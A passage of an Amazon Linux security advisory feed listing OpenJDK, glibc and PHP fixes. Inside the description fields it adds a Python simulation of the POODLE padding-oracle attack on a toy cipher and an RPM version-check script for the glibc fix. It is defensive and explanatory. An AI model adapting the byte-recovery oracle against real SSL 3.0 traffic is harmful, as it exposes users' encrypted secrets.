version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.75-2.5.4.0.53.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.75-2.5.4.0.53.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.75-2.5.4.0.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-472</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-472: important priority package update for java-1.8.0-openjdk</title><issued date="2015-01-22 14:20:00" /><updated date="2015-01-22 16:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0437:
Multiple flaws were found in the way the Hotspot component in OpenJDK verified bytecode from the class files, and in the way this component generated code for bytecode. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2015-0412:
Multiple improper permission check issues were discovered in the JAX-WS, Libraries, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0410:
A flaw was found in the way the DER (Distinguished Encoding Rules) decoder in the Security component in OpenJDK handled negative length values. A specially crafted, DER-encoded input could cause a Java application to enter an infinite loop when decoded.
CVE-2015-0408:
Multiple improper permission check issues were discovered in the JAX-WS, Libraries, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0407:
An information leak flaw was found in the Swing component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-0395:
A flaw was found in the way the Hotspot garbage collector handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2015-0383:
Multiple insecure temporary file use issues were found in the way the Hotspot component in OpenJDK created performance statistics and error log files. A local attacker could possibly make a victim using OpenJDK overwrite arbitrary files using a symlink attack.
CVE-2014-6601:
Multiple flaws were found in the way the Hotspot component in OpenJDK verified bytecode from the class files, and in the way this component generated code for bytecode. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2014-6593:
It was discovered that the SSL/TLS implementation in the JSSE component in OpenJDK failed to properly check whether the ChangeCipherSpec was received during the SSL/TLS connection handshake. An MITM attacker could possibly use this flaw to force a connection to be established without encryption being enabled.
CVE-2014-6591:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-6587:
A NULL pointer dereference flaw was found in the MulticastSocket implementation in the Libraries component of OpenJDK. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions.
CVE-2014-6585:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-6549:
Multiple improper permission check issues were discovered in the JAX-WS, Libraries, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-3566:
A flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.
1152789:
CVE-2014-3566 openssl: Padding Oracle On Downgraded Legacy Encryption attack
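The CVE-2014-3566 entry above (and the identical one in ALAS-2015-471) states the POODLE condition in one sentence: SSL 3.0 bounds-checks only the padding length byte and never checks the padding bytes themselves, so an attacker who can replay the victim's request over fresh connections learns one plaintext byte every 256 connections on average. The following Python simulation is an added example, not part of this advisory or of Amazon's or OpenJDK's code. It assumes a constructed setting: an 8-byte toy Feistel block cipher built on HMAC-SHA256 stands in for the real block cipher, HMAC-SHA256 truncated to 16 bytes stands in for the record MAC, and the attacker (in the POODLE model, script running in the victim's browser) controls the request prefix and suffix lengths, triggers one fresh connection with new keys and IV per attempt, and observes only whether the server accepts or rejects the tampered record.

```python
import hashlib
import hmac
import random

BLOCK = 8        # toy cipher block size in bytes
ROUNDS = 8
MAC_LEN = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    # Feistel round function: HMAC-SHA256 truncated to the half-block width (constructed toy cipher).
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:4]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:4], block[4:]
    for rnd in range(ROUNDS):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:4], block[4:]
    for rnd in reversed(range(ROUNDS)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, xor(data[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        cur = data[i:i + BLOCK]
        out += xor(block_decrypt(key, cur), prev)
        prev = cur
    return out


def ssl3_seal(key: bytes, mac_key: bytes, iv: bytes, content: bytes) -> bytes:
    """Client side: content, then MAC, then SSL 3.0 padding whose final byte holds
    the number of padding bytes that precede it."""
    mac = hmac.new(mac_key, content, hashlib.sha256).digest()[:MAC_LEN]
    body = content + mac
    pad_len = (BLOCK - (len(body) + 1) % BLOCK) % BLOCK
    return cbc_encrypt(key, iv, body + bytes(pad_len) + bytes([pad_len]))


def ssl3_open(key: bytes, mac_key: bytes, iv: bytes, record: bytes) -> bool:
    """Server side. The flaw: only the length byte is bounds-checked; the padding
    bytes are never compared against anything, so any final block whose last byte
    decrypts to BLOCK-1 is stripped as padding and the MAC over the rest passes."""
    plain = cbc_decrypt(key, iv, record)
    pad_len = plain[-1]
    if pad_len > BLOCK - 1:
        return False
    body = plain[:len(plain) - pad_len - 1]
    content, mac = body[:len(body) - MAC_LEN], body[len(body) - MAC_LEN:]
    expect = hmac.new(mac_key, content, hashlib.sha256).digest()[:MAC_LEN]
    return hmac.compare_digest(expect, mac)


def _rand_bytes(rng: random.Random, n: int) -> bytes:
    return bytes(rng.getrandbits(8) for _ in range(n))


def poodle_recover_byte(secret: bytes, index: int, rng: random.Random):
    """Recover secret[index]. Prefix/suffix lengths put the target byte last in
    block t and make the final block pure padding (length byte BLOCK-1). On each
    fresh connection (new keys and IV, same request) the final ciphertext block is
    replaced with block t; acceptance leaks D(C_t)[-1] xor C_{n-2}[-1] == BLOCK-1.
    Returns (recovered_byte, connections_used)."""
    prefix_len = (BLOCK - 1 - index) % BLOCK
    suffix_len = (-(prefix_len + len(secret) + MAC_LEN)) % BLOCK
    t = (prefix_len + index) // BLOCK
    attempts = 0
    while True:
        attempts += 1
        key, mac_key, iv = _rand_bytes(rng, 16), _rand_bytes(rng, 16), _rand_bytes(rng, BLOCK)
        content = b"A" * prefix_len + secret + b"B" * suffix_len
        record = ssl3_seal(key, mac_key, iv, content)
        blocks = [iv] + [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
        n = len(record) // BLOCK
        tampered = record[:len(record) - BLOCK] + blocks[t + 1]
        if ssl3_open(key, mac_key, iv, tampered):
            # Undo the CBC chaining of block t: P_t[-1] = (BLOCK-1) xor C_{n-2}[-1] xor C_{t-1}[-1].
            return (BLOCK - 1) ^ blocks[n - 1][-1] ^ blocks[t][-1], attempts


def poodle_recover(secret: bytes, seed: int = 0):
    """Recover every byte of a constructed secret; returns (recovered, total_connections)."""
    rng = random.Random(seed)
    out, total = bytearray(), 0
    for index in range(len(secret)):
        b, used = poodle_recover_byte(secret, index, rng)
        out.append(b)
        total += used
    return bytes(out), total
```

Dividing the second return value of poodle_recover by the secret length gives the connections-per-byte figure; over a few seeds it settles near 256, which is the number in the advisory text. The point for a practitioner is the ssl3_open check: TLS 1.0 and later close the oracle by requiring every padding byte to equal the length byte, which is why the fix is to refuse SSL 3.0 rather than to patch the cipher.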
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566" title="" id="CVE-2014-3566" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6549" title="" id="CVE-2014-6549" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6585" title="" id="CVE-2014-6585" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6587" title="" id="CVE-2014-6587" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6591" title="" id="CVE-2014-6591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6593" title="" id="CVE-2014-6593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6601" title="" id="CVE-2014-6601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0383" title="" id="CVE-2015-0383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0395" title="" id="CVE-2015-0395" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0407" title="" id="CVE-2015-0407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0408" title="" id="CVE-2015-0408" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0410" title="" id="CVE-2015-0410" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0412" title="" id="CVE-2015-0412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0437" title="" id="CVE-2015-0437" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0069.html" title="" id="RHSA-2015:0069" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.31-2.b13.5.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" 
version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-473</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-473: critical priority package update for glibc</title><issued date="2015-01-27 11:41:00" /><updated date="2015-01-28 19:57:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0235:
A heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.
1183461:
CVE-2015-0235 glibc: __nss_hostname_digits_dots() heap-based buffer overflow
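The operational question this advisory raises is whether a given host already carries glibc at or beyond 2.17-55.93.amzn1. Comparing RPM versions by string or float is wrong (55.93 is older than 55.100), so the check needs rpm's own segment-wise ordering. The following Python is an added example, not Amazon's tooling or part of this feed: it ports the rpmvercmp() algorithm (without the newer caret rule), applies epoch, then version, then release, and compares the output of `rpm -q glibc` against the fix level listed in this advisory's pkglist. The installed version string used as sample input is constructed for the example.

```python
import re
from typing import Tuple

# Fix level advertised by ALAS-2015-473, taken from the pkglist: glibc-2.17-55.93.amzn1, epoch 0.
FIXED_GLIBC_EVR = ("0", "2.17", "55.93.amzn1")

_TOKEN = re.compile(r"[0-9]+|[A-Za-z]+|~")


def _cmp(a, b) -> int:
    """Three-way compare: 1 if a is greater, -1 if smaller, 0 if equal."""
    if a == b:
        return 0
    return 1 if a > b else -1


def rpmvercmp(a: str, b: str) -> int:
    """Port of rpm's rpmvercmp() for one version or release string.

    Runs of digits and runs of letters are compared segment by segment: numeric
    segments compare as integers (leading zeros ignored), a numeric segment is
    newer than an alphabetic one, and a tilde sorts before anything, including
    the end of the string (so "1.0~rc1" is older than "1.0"). Separators such
    as "." and "-" only delimit segments. The caret rule of newer rpm is omitted.
    """
    if a == b:
        return 0
    ta, tb = _TOKEN.findall(a), _TOKEN.findall(b)
    i = 0
    while True:
        x = ta[i] if i != len(ta) else None
        y = tb[i] if i != len(tb) else None
        if x == "~" or y == "~":
            if x == "~" and y == "~":
                i += 1
                continue
            return -1 if x == "~" else 1
        if x is None and y is None:
            return 0
        if x is None:
            return -1                       # b has segments left, so b is newer
        if y is None:
            return 1
        if x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1  # numeric beats alphabetic
        if x.isdigit():
            x, y = x.lstrip("0"), y.lstrip("0")
            if len(x) != len(y):
                return 1 if len(x) > len(y) else -1
        r = _cmp(x, y)
        if r != 0:
            return r
        i += 1


def evr_compare(installed: Tuple[str, str, str], fixed: Tuple[str, str, str]) -> int:
    """Compare (epoch, version, release) triples: epoch decides first, then version, then release."""
    e1, v1, r1 = installed
    e2, v2, r2 = fixed
    r = _cmp(int(e1 or "0"), int(e2 or "0"))
    if r != 0:
        return r
    r = rpmvercmp(v1, v2)
    if r != 0:
        return r
    return rpmvercmp(r1, r2)


def parse_nvra(nvra: str) -> Tuple[str, str, str, str]:
    """Split 'name-version-release.arch' as printed by `rpm -q NAME`. Names may
    contain dashes (java-1.7.0-openjdk), so split from the right."""
    stem, arch = nvra.rsplit(".", 1)
    name, version, release = stem.rsplit("-", 2)
    return name, version, release, arch


def is_fixed(installed_nvra: str, installed_epoch: str, fix_name: str, fix_evr: Tuple[str, str, str]) -> bool:
    """True if the installed package is at or beyond the advisory's fix level.
    The epoch is passed separately because `rpm -q` does not print it; obtain it
    with `rpm -q --qf '%{EPOCH}' NAME`, which prints "(none)" when unset."""
    name, version, release, _arch = parse_nvra(installed_nvra)
    if name != fix_name:
        raise ValueError("advisory covers %s, got %s" % (fix_name, name))
    epoch = "0" if installed_epoch in ("", "(none)", None) else installed_epoch
    return evr_compare((epoch, version, release), fix_evr) >= 0


# Constructed sample: `rpm -q glibc` on a host that has not yet applied ALAS-2015-473.
SAMPLE_INSTALLED = "glibc-2.17-55.87.amzn1.x86_64"


def check_alas_2015_473(installed_nvra: str = SAMPLE_INSTALLED, epoch: str = "(none)") -> bool:
    return is_fixed(installed_nvra, epoch, "glibc", FIXED_GLIBC_EVR)


if __name__ == "__main__":
    print(check_alas_2015_473())  # False: release 55.87 is older than the 55.93 fix
```

Because the vulnerable function lives in the shared library, a package at the fix level is necessary but not sufficient: every long-running process that loaded the old libc.so.6 keeps executing the vulnerable code until it is restarted, so pair this check with a restart of affected services or a reboot.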
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235" title="" id="CVE-2015-0235" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-utils" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="55.93.amzn1" epoch="0" 
arch="i686"><filename>Packages/glibc-common-2.17-55.93.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.93.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-474</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-474: medium priority package update for php55</title><issued date="2015-02-11 19:33:00" /><updated date="2015-02-11 19:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0232:
The exif_process_unicode function in ext/exif/exif.c in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image.
1185472:
CVE-2015-0232 php: Free called on uninitialized pointer in exif.c
CVE-2015-0231:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.
1185397:
CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)
CVE-2014-9427:
sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping's length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping.
1178736:
CVE-2014-9427 php: out of bounds read when parsing a crafted .php file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427" title="" id="CVE-2014-9427" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231" title="" id="CVE-2015-0231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232" title="" id="CVE-2015-0232" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-pgsql" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.21" release="1.96.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-ldap-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.21" 
release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.21" release="1.96.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-embedded-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.21" release="1.96.amzn1" epoch="0" 